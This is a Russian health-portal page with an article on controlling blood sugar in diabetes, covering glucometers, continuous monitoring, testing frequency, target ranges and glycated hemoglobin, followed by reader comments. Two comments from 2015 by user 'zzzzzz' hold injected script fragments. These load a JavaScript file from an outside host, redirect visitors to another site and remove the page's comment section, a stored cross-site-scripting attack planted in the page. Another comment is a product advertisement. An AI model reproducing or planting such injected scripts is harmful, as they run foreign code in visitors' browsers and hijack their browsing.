Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как контролировать уровен...  >>  Как контролировать уровень сахара
 
Обратная связь
 

Как контролировать уровень сахара

Размер шрифта
01 мая 2013 00:00
  • google_analytics: false
  • Нравится

Каждый пациент с сахарным диабетом должен регулярно проверять уровень глюкозы крови, чтобы держать его в приемлемых значениях. Пренебрежение этим принципом почти гарантированно приведет к развитию грозных осложнений этого заболевания.

Способы контроля уровня глюкозы в крови

  • Традиционное измерение в домашних условиях. Традиционный метод проверки уровня глюкозы состоит в следующем: осуществляется прокол кончика пальца с помощью специального ланцета (маленькая острая игла), затем – нанесение капли крови на тест-полоску и, наконец, введение тест-полоски в специальный прибор (глюкометр). Существует множество вариантов приборов: адаптированные для слабовидящих больных; портативные приборы; приборы с высокой скоростью измерения глюкозы; удобного размера и приемлемой цены. Современные устройства выдают результат буквально через 15 секунд, могут сохранять в памяти определенное количество результатов измерения для использования их в будущем. Некоторые приборы могут вычислять средний уровень глюкозы в крови в течение определенного периода времени. Другие имеют программное обеспечение, которое позволяет извлекать информацию из памяти прибора и выдавать на дисплее графики и диаграммы последних результатов измерения. Глюкометры и тест-полоски можно приобрести в любой аптеке.
  • Система постоянного мониторинга глюкозы (также известная как прибор для интерстициального измерения глюкозы). Некоторые из этих устройств совмещают с инсулиновыми помпами. Измерения не такие точные, как при стандартном проколе пальца, однако, такие устройства могут быть использованы для оценки общей картины и тенденций изменений показателей глюкозы.
  • В настоящее время проводятся исследования новейших приборов, использующих спектроскопию и электромагнитные волны в качестве метода измерения глюкозы крови без прокола кожи.

Когда следует измерять сахар
Если ответить одним словом – регулярно.

Независимо от того, получаете вы инсулин или принимаете сахароснижающие препараты, регулярные измерения сахара должны стать обязательными для вас.
Периодичность и время измерения глюкозы устанавливаются строго индивидуально. Лечащий врач проконсультирует вас, когда и как часто следует измерять уровень сахара.
Наличие острых или хронических заболевания, а также смена лекарственных препаратов могут повлиять на уровень глюкозы. В этих случаях необходимо проверять уровень глюкозы чаще.

Состояния, влияющие на уровень глюкозы
Некоторые состояния, такие как анемия, подагра, повышенные температура и влажность воздуха, высота над уровнем моря, могут серьезно повлиять на показатели глюкозы крови.
Если же вы слишком часто замечаете ненормальные показатели глюкозы, то вам следует откалибровать прибор или проверить тест-полоски.
Приведенная ниже таблица дает представления о том, каким должен быть сахар в течение дня:

Время

Норма для взрослых

Перед едой

3,8-7,2ммоль/л

После еды

Менее 10 ммоль/л

 

Гликированный гемоглобин

Это еще один показатель, не менее важный, чем уровень глюкозы. Он очень широко применяется в клинической практике. Однако многие домашние приборы также умеют его определять. И эта информация будет совсем не лишней для вашего лечащего врача.

Записывайте свои результаты

Большинство глюкометров сохраняют результаты измерений в памяти. Но даже если такая возможность не предусмотрена, самостоятельно ведите записи о любых измерениях, которые вы делаете, будь то показатели крови, мочи, кетонов.
Эти записи помогут лечащему врачу вносить коррективы в схему лечения: изменять компоненты диеты, дозировки препаратов. Имейте при себе записи результатов измерения на каждом визите к врачу.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

01 мая 2013 в 06:31

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 19:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - Гость

29 сентября 2016 в 13:06

Цитировать   |   Пожаловаться

Здравствуйте! Компания посредник по доставке товаров из германии express2russia, запустила проект по доставке систем мониторинга уровня СК - FreeStyle Libre. Система не требует прокола пальца и состоит из: сенсора, который крепится на предплечье и считывающего сканера. Кому интересно, вот ссылка http://diabetik.biz

Статьи

       
Что влияет на показатели сахара?   Что случится, если вы откажитесь от сладкой газировки   Самые популярные мифы о диабете   Сахарный запой. Почему так сложно отказаться от сахара?  
09 апреля 2013Знаете ли вы ваш уровень сахара 04 сентября 2012Косметика вызывает диабет!
 
28 августа 2012Если вы лечите диабет – будете умнее! 13 августа 2012Всего две инъекции антител вылечат сахарный диабет!
 

Слайдшоу

1
Лучшая и худшая еда для диабета. Часть 2
Вся правда о диабете 1 типа
Диабет 2 типа. Кто виноват? Часть 1

Тесты

1
Есть ли у вас скрытый риск диабета?
Оцените риск развития сахарного диабета
Что вы знаете о поджелудочной железе?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.